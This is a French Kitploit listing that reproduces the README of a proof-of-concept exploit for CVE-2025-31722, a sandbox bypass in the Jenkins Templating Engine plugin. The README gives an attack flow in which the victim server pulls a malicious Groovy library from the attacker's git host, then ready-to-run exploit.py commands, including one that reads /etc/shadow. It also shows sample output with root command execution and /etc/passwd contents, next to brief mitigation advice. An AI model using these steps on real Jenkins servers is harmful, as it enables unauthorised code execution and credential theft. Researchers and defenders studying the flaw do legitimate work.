Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-31722 — Exploit de preuve de concept pour le contournement du bac à sable du plugin Jenkins Templating Engine (CVE-2025-31722) permettant l'exécution de code à distance via l'injection de bibliothèque Groovy malveillante. | Kitploit
Outils/GitHubGitHub/h3raklez/cve-2025-31722
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

Exploit de preuve de concept pour le contournement du bac à sable du plugin Jenkins Templating Engine (CVE-2025-31722) permettant l'exécution de code à distance via l'injection de bibliothèque Groovy malveillante.

Voir le dépôt
34il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-31722 — Jenkins Templating Engine RCE

À des fins éducatives et de recherche en sécurité autorisées uniquement.

Description

Vulnérabilité de contournement du sandbox dans le plugin Jenkins Templating Engine (JTE) <= 2.5.3 qui permet à un utilisateur peu privilégié d'exécuter du code arbitraire sur le serveur Jenkins.

Le défaut survient parce que JTE charge des bibliothèques à partir d'un dépôt git externe défini dans une configuration GovernanceTier au niveau du dossier et exécute les étapes de ces bibliothèques en dehors du sandbox Groovy, indépendamment du niveau de privilège de l'utilisateur qui a créé le job.

CVSS : 8.8 (Élevé)
Type : Contournement de sandbox → RCE
Composant affecté : plugin pipeline-templating-engine ≤ 2.5.3
Version corrigée : 2.5.4+


Flux d'attaque

root@kitploit:~
Attacker (Kali)                          Jenkins Server
───────────────                          ──────────────
1. Creates git repo with evil.groovy
2. Starts git daemon on :9418
3. Creates folder in Jenkins        →    Folder with GovernanceTier
   pointing to git://KALI:9418/…         pointing to attacker's repo
4. Creates job with AdHoc template  →    Job calls evil()
5. Triggers build                   →    JTE clones repo from Kali
                                         Executes evil() outside sandbox
                                    ←    RCE as Jenkins user

Prérequis

Serveur Jenkins (cible)

  • Jenkins avec le plugin Templating Engine 2.5.3 installé
  • Plugins : cloudbees-folder, git, workflow-aggregator
  • CSRF désactivé
  • Utilisateur attacker avec les permissions : Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • Nœud intégré en ligne avec au moins 1 exécuteur
  • Connectivité réseau sortante du serveur vers l'IP de l'attaquant sur le port 9418

Machine attaquante (Kali)

  • Python 3.8+
  • git installé
  • Port 9418 accessible depuis le serveur Jenkins
  • Bibliothèque Python : requests
root@kitploit:~
pip install requests

Configuration du laboratoire

L'installation sur un serveur Debian/Ubuntu a installé Jenkins, configuré les utilisateurs, les permissions et les plugins requis. Il ne crée aucun contenu malveillant — cela est géré exclusivement par le PoC.


Utilisation

Exploitation de base

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

Commande personnalisée

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

Nettoyage

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

Paramètres

ParamètreDescriptionRequis
--urlURL de base de JenkinsOui
--userUtilisateur avec les permissions Item/CREATE+CONFIGURE+BUILDOui
--passMot de passe de l'utilisateurOui
--git-hostIP Kali accessible depuis JenkinsOui
--cmdCommande à exécuter sur le serveur (par défaut : id && hostname && cat /etc/passwd)Non
--cleanupSupprime le dossier, le job et le dépôt créés par l'exploitNon

Fonctionnement du PoC

  1. setup_repo() — Crée ~/jte-exploit/evil-lib/steps/evil.groovy sur Kali avec la commande à exécuter
  2. start_git_daemon() — Démarre git daemon sur Kali sur le port 9418
  3. create_folder() — Crée un dossier dans Jenkins avec un GovernanceTier pointant vers git://KALI:9418/jte-exploit
  4. create_job() — Crée un job avec AdHocTemplateFlowDefinition qui déclare evil-lib et appelle evil()
  5. trigger_and_wait() — Déclenche le build et attend le résultat
  6. print_output() — Affiche la sortie console avec le résultat du RCE

Le démon git reste actif pendant tout le cycle de build et est arrêté automatiquement une fois le build terminé.


Sortie attendue

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

Atténuation

  • Mettre à jour le plugin Templating Engine vers la version 2.5.4 ou ultérieure
  • Restreindre les permissions Item/CREATE et Item/CONFIGURE aux seuls utilisateurs de confiance
  • Activer la protection CSRF dans Jenkins
  • Auditer les dossiers avec des configurations GovernanceTier pointant vers des dépôts externes

Références

  • Jenkins Security Advisory
  • JTE Plugin GitHub

Avertissement légal : Ce PoC est destiné uniquement à des fins éducatives et à des tests dans des environnements contrôlés. L'utiliser contre des systèmes sans autorisation explicite est illégal.

Télécharger l’outil